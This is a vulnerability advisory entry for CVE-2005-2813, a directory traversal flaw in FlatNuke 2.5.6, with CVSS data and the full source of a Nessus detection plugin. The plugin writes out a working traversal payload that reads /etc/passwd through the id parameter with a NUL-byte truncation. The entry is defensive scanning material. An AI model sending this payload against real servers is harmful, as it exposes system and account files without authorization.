CVE-2005-2813 - Directory traversal vulnerability in FlatNuke 2.5.6

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE

Summary

Directory traversal vulnerability in FlatNuke 2.5.6 and possibly earlier allows remote attackers to read arbitrary files via ".." sequences and a trailing "%00" (NUL byte) in the id parameter of the read mod in index.php. Note that the impact metrics listed above (Confidentiality NONE / Integrity PARTIAL) do not match an arbitrary-file-read flaw; the Nessus plugin below scores it as CVSS2 AV:N/AC:L/Au:N/C:P/I:N/A:N. The NUL-byte truncation only works when PHP's magic_quotes_gpc is disabled (when enabled it escapes NUL bytes), which is why the plugin's workaround is to enable it; since magic_quotes_gpc was removed in later PHP releases, fixing the input validation in FlatNuke itself is the durable remediation.

Vulnerable Configurations

Part: Application — Description: FlatNuke — Count: 1

Exploit-Db

description: FlatNuke 2.5.6 ID Parameter Directory Traversal Vulnerability. CVE-2005-2813. Web application exploit for the PHP platform.
id: EDB-ID:26212
last seen: 2016-02-03
modified: 2005-08-31
published: 2005-08-31
reporter: rgod
source: https://www.exploit-db.com/download/26212/
title: FlatNuke 2.5.6 ID Parameter Directory Traversal Vulnerability

Nessus

NASL family: CGI abuses
NASL id: FLATNUKE_ID_DIR_TRAVERSAL.NASL
description: The remote host is running FlatNuke, a content management system written in PHP and using flat files rather than a database for its storage. The version of FlatNuke installed on the remote host fails to remove directory traversal sequences from user input to the 'id' parameter of the 'index.php' script.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 20293
published: 2005-12-12
reporter: This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/20293
title: FlatNuke index.php id Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

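# Plugin registration: metadata, CVSS scoring and dependencies for the
# FlatNuke 'id' parameter directory traversal check (CVE-2005-2813 /
# CVE-2005-4208).
if (description) {
  script_id(20293);
  script_version("1.24");
  script_cvs_date("Date: 2018/11/15 20:50:17");

  script_cve_id("CVE-2005-2813", "CVE-2005-4208");
  script_bugtraq_id(14702, 15796);

  script_name(english:"FlatNuke index.php id Parameter Traversal Arbitrary File Access");
  script_summary(english:"Checks for id parameter directory traversal vulnerability in FlatNuke");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
directory traversal vulnerability." );
  # The exploit relies on a trailing NUL byte (%00) to truncate the path
  # FlatNuke builds from 'id'.  PHP's magic_quotes_gpc escapes NUL bytes in
  # request parameters, so the flaw is only exploitable while that setting is
  # DISABLED -- which is also why the solution below says to enable it.  The
  # previous wording ("Provided ... is enabled") contradicted the solution.
  script_set_attribute(attribute:"description", value:
"The remote host is running FlatNuke, a content management system
written in PHP and using flat files rather than a database for its
storage. 

The version of FlatNuke installed on the remote host fails to remove
directory traversal sequences from user input to the 'id' parameter
of the 'index.php' script.  Provided PHP's 'magic_quotes_gpc' setting
is disabled, an attacker can leverage this flaw to read arbitrary files
on the remote host subject to the privileges of the web server user
id." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Dec/107" );
  # NOTE(review): magic_quotes_gpc is a deprecated PHP feature that is absent
  # from later PHP releases; on such hosts the only durable fix is to patch
  # FlatNuke's input handling.
  script_set_attribute(attribute:"solution", value:
"Enable PHP's 'magic_quotes_gpc' setting." );
  # Arbitrary file read: confidentiality impact only.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/12");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/30");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_ATTACK: this plugin actively sends the traversal payload.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}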


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

# Active check: request index.php?mod=read&id=<traversal>%00 under each
# candidate directory and report if the response contains /etc/passwd.
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# The payload is the same for every directory, so build it once: climb out
# of the web root to /etc/passwd and append an encoded NUL so whatever
# FlatNuke appends to the path is truncated.
traversal = "../../../../../../../../../../../../../etc/passwd";
query = strcat("/?", "mod=read&", "id=", traversal, "%00");

# Candidate application directories; the default install path is only
# added when thorough tests are enabled.
if (thorough_tests) candidates = list_uniq(make_list("/flatnuke", cgi_dirs()));
else candidates = make_list(cgi_dirs());

foreach dir (candidates)
{
  res = http_send_recv3(port:port, method: "GET", item: strcat(dir, query));
  # No response at all: the server went away, so stop scanning.
  if (isnull(res)) exit(0);

  body = res[2];
  # A root account line in the body means the passwd file came back.
  if (!egrep(pattern:"root:.*:0:[01]:", string: body)) continue;

  # Strip the surrounding page markup so the report shows only the file
  # contents; fall back to the whole body if the markers are missing.
  output = strstr(body, 'read.png" alt="Read"> ');
  if (output) output = output - 'read.png" alt="Read"> ';
  if (output) output = output - strstr(output, '</font></td>');
  if (isnull(output)) output = body;
  # Never echo raw password hashes into the report.
  output = data_protection::redact_etc_passwd(output:output);

  report = '\n';
  foreach line (split(output, keep: 0))
    report = strcat(report, clean_string(s: line), '\n');

  security_warning(port:port, extra: report);
  exit(0);
}